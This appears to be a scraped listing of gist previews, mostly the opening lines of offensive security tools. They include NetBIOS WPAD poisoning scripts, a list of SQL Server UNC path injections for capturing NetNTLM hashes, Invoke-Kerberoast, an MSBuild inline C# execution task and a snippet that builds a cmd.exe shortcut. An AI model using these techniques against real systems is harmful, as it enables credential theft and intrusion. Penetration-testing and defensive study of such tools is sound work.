This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Get-DownloadedPEHashes | |
{ | |
[CmdletBinding()] | |
Param( | |
[Parameter(Mandatory=$true, Position=0)] | |
[String]$Path, | |
[Switch]$Recursive = $true | |
) | |
if (!$Path.EndsWith('\')) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env ruby | |
# -*- coding: binary -*- | |
# | |
# Poison a system's NetBIOS resolver for the WPAD name (not BadTunnel) | |
# | |
# Usage: ruby netbios-brute-local.rb <evil-wpad-server> <target-ip> <target-port> <pps> | |
# Contact: x[at]hdm.io | |
# License: https://opensource.org/licenses/BSD-2-Clause | |
# |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env ruby | |
# -*- coding: binary -*- | |
# | |
# Poison a system's NetBIOS resolver for the WPAD name from outside NAT (not BadTunnel) | |
# | |
# Usage: ruby netbios-brute-nat.rb <evil-wpad-server> <pps> | |
# Contact: x[at]hdm.io | |
# License: https://opensource.org/licenses/BSD-2-Clause | |
# |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.Diagnostics; | |
using System.Runtime.InteropServices; | |
using RGiesecke.DllExport; | |
namespace Export | |
{ | |
class Test | |
{ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# update apt-get | |
export DEBIAN_FRONTEND="noninteractive" | |
sudo apt-get update | |
# remove previously installed Docker | |
sudo apt-get purge lxc-docker* | |
sudo apt-get purge docker.io* |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This is a list of SQL Server commands that support UNC path [injections] by default. | |
The injections can be used to capture or replay the NetNTLM password hash of the | |
Windows account used to run the SQL Server service. The SQL Server service account | |
has sysadmin privileges by default in all versions of SQL Server. | |
Note: This list is most likely not complete. | |
----------------------------------------------------------------------- | |
-- UNC Path Injections Executable by the Public Fixed Server Role | |
----------------------------------------------------------------------- |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<# | |
Invoke-Kerberoast.ps1 | |
Author: Will Schroeder (@harmj0y), @machosec | |
License: BSD 3-Clause | |
Required Dependencies: None | |
Credit to Tim Medin (@TimMedin) for the Kerberoasting concept and original toolset implementation (https://github.com/nidem/kerberoast). | |
Note: the primary method of use will be Invoke-Kerberoast with various targeting options. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
<!-- This inline task executes c# code. --> | |
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe pshell.xml --> | |
<!-- Author: Casey Smith, Twitter: @subTee --> | |
<!-- License: BSD 3-Clause --> | |
<PropertyGroup> | |
<FunctionName Condition="'$(FunctionName)' == ''">None</FunctionName> | |
<Cmd Condition="'$(Cmd)' == ''">None</Cmd> | |
</PropertyGroup> | |
<Target Name="Hello"> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Get-SystemDriver requires the ConfigCI module on Win10 Enterprise | |
# This will collect all signer information for all PEs in C:\ | |
# This will take a while!!! | |
$Signers = Get-SystemDriver -ScanPath C:\ -UserPEs | |
# Associate the subject name of each certificate to the file/signer info | |
# so we can correlate the two. | |
$CertSubjectMapping = $Signers | % { | |
$Signer = $_ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$file = Get-Content "c:\test\test.txt" | |
$WshShell = New-Object -comObject WScript.Shell | |
$Shortcut = $WshShell.CreateShortcut("c:\test\test.lnk") | |
$Shortcut.TargetPath = "%SystemRoot%\system32\cmd.exe" | |
$Shortcut.IconLocation = "%SystemRoot%\System32\Shell32.dll,21" | |
$Shortcut.Arguments = ' '+ $file | |
$Shortcut.Save() |
OlderNewer